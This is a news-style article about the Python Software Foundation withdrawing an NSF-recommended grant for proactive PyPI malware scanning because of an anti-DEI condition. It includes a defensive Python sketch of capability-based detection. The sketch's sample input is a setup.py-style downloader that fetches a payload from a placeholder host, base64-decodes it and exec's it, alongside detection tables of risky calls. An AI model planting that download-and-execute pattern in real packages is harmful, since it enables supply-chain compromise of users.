Python, one of the world's most popular programming languages, powers countless open-source projects and commercial applications. Its vast and active ecosystem, however, also carries security risk, in particular software supply-chain risk such as malicious packages published to PyPI. To address this, the Python Software Foundation (PSF) submitted a $1.5 million grant proposal to the U.S. National Science Foundation (NSF), its first attempt at securing government funding.
The process then took an unexpected turn. PSF announced on its official website and on Reddit that it had withdrawn the proposal, which NSF had already recommended for funding, because of conditions it found unacceptable, including a requirement to halt all diversity, equity, and inclusion (DEI) initiatives. The decision has sparked widespread discussion in the open-source and tech communities amid an increasingly complex global tech landscape.
**The Security-Focused Proposal** PSF's proposal fell under NSF's "Secure and Trustworthy Open-Source Ecosystems" program and aimed to strengthen Python's security, particularly that of PyPI (the Python Package Index). The project planned to build automated tooling that would scan every PyPI upload for malware proactively, replacing today's reactive approach, in which malicious packages are typically found and removed only after someone reports them. The tools would use "capability analysis", which classifies code by what it is able to do (for example, reach the network or execute dynamically generated code) rather than by exact byte signatures, trained on datasets of known malicious packages, and were intended to be reusable by other open-source registries such as npm and crates.io.
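To make the idea of capability analysis concrete, here is a small, self-contained sketch in Python. It is an added example, not PSF's or PyPI's own tooling, and everything in it beyond the general technique is an assumption: the module-to-capability and call-to-capability tables, the "known malicious" capability profiles, the Jaccard-based scoring, and the two constructed sample inputs (a benign config loader and a `setup.py`-style downloader that base64-decodes and `exec`s a fetched payload). The point it shows is that a scanner keyed on capabilities flags the downloader even though it contains no known signature, while a threshold keeps the benign file, which shares one capability with a malicious profile, from being reported.

```python
"""Toy capability analysis for a Python package file.

Added example, not the PSF's or PyPI's tooling. Capability analysis records
what a module *can do* (open network connections, spawn processes, run
dynamically built code, decode obfuscated blobs) and compares that set with
capability profiles drawn from known-malicious samples, instead of matching
exact byte signatures. All tables and sample inputs below are constructed.
"""
import ast

# Assumed: imported module -> capability label (constructed table).
IMPORT_CAPABILITIES = {
    "socket": "network", "urllib.request": "network", "requests": "network",
    "subprocess": "process_exec", "ctypes": "native_code",
    "base64": "obfuscation", "zlib": "obfuscation", "marshal": "obfuscation",
}

# Assumed: fully qualified call -> capability label (constructed table).
CALL_CAPABILITIES = {
    "exec": "dynamic_code", "eval": "dynamic_code", "compile": "dynamic_code",
    "os.system": "process_exec", "os.popen": "process_exec",
    "subprocess.run": "process_exec", "subprocess.Popen": "process_exec",
    "base64.b64decode": "obfuscation", "marshal.loads": "obfuscation",
    "urllib.request.urlopen": "network", "requests.get": "network",
    "open": "file_io", "os.environ.get": "env_read",
}

# Assumed: capability profiles of "known malicious" samples (constructed).
KNOWN_MALICIOUS_PROFILES = {
    "downloader-and-exec": {"network", "obfuscation", "dynamic_code"},
    "credential-stealer": {"env_read", "file_io", "network"},
    "reverse-shell": {"network", "process_exec"},
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def extract_capabilities(source):
    """Statically derive the capability set of a module from its source text."""
    caps = set()
    aliases = {}  # local name -> imported object, e.g. "b64" -> "base64"
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                aliases[alias.asname or alias.name] = alias.name
                if alias.name in IMPORT_CAPABILITIES:
                    caps.add(IMPORT_CAPABILITIES[alias.name])
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module in IMPORT_CAPABILITIES:
                caps.add(IMPORT_CAPABILITIES[node.module])
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:  # e.g. a call on the result of another call
                continue
            head, _, rest = name.partition(".")
            resolved = aliases.get(head, head) + (f".{rest}" if rest else "")
            if resolved in CALL_CAPABILITIES:
                caps.add(CALL_CAPABILITIES[resolved])
    return caps


def match_known_malicious(caps, profiles=KNOWN_MALICIOUS_PROFILES):
    """Closest profile by Jaccard similarity, as (label, score)."""
    best = (None, 0.0)
    for label, profile in profiles.items():
        union = caps | profile
        score = len(caps & profile) / len(union) if union else 0.0
        if score > best[1]:
            best = (label, score)
    return best


def classify(caps, threshold=0.75):
    """Return the matched profile label, or None below the threshold."""
    label, score = match_known_malicious(caps)
    return label if score >= threshold else None


# Constructed sample inputs (not real packages).
SUSPICIOUS_SETUP = '''
import base64 as b64
from urllib.request import urlopen
payload = urlopen("http://example.invalid/stage2").read()
exec(b64.b64decode(payload))
'''
BENIGN_MODULE = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_MODULE)):
        caps = extract_capabilities(src)
        print(name, sorted(caps), classify(caps))
```

The benign loader still scores 1/3 against the "credential-stealer" profile because both touch files; a real scanner would weight capabilities, look at package metadata and install hooks, and feed verdicts to a human reviewer rather than block on a single similarity score.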
PSF put significant effort into the proposal, with Security Developer-in-Residence Seth Larson as Principal Investigator (PI) and Deputy Executive Director Loren Crary as co-PI. "Navigating the complex application process was a steep learning curve for our small team," PSF stated. "We believed this project aligned perfectly with our mission and could bring substantial benefits to the community." After months of review, the proposal was recommended for funding by NSF, a notable achievement given NSF's 36% approval rate for first-time applicants.
**The Controversial Conditions** The celebration was short-lived. NSF attached a clause requiring PSF to confirm it would "not operate or promote any programs advancing DEI or engage in activities violating federal anti-discrimination laws" for the duration of the grant. PSF's legal counsel advised that the restriction applied to all of the foundation's activities, not just the funded project. Worse, NSF reserved the right to claw back funds already disbursed if the clause was breached, which PSF called "an unquantifiable financial risk."
For PSF, whose mission emphasizes fostering a diverse global Python community, accepting these terms would have meant compromising core values. The $1.5M grant, measured against PSF's roughly $5M annual budget, would have significantly bolstered Python's security, so the foundation faced a dilemma: growth versus principles.
**A Unanimous Decision** After an internal vote, PSF's board unanimously chose to withdraw. "No project or funding should override our values or mission," PSF declared. Simon Willison, Django co-creator and PSF board member, supported the move on his blog: "Accepting the grant carried existential risks. I'm proud our board made this tough, united decision."
The tech community largely applauded PSF's stance. Some noted that the large corporations that depend on Python could easily cover the $1.5M cost of the infrastructure themselves, given the project's importance. Others called the withdrawal a "pragmatic choice" that avoided potential financial ruin.
PSF is now asking the community for support so it can continue the work independently. The case underscores a broader challenge for open-source organizations: balancing funding opportunities against an unwavering commitment to their values.
What are your thoughts on PSF's decision?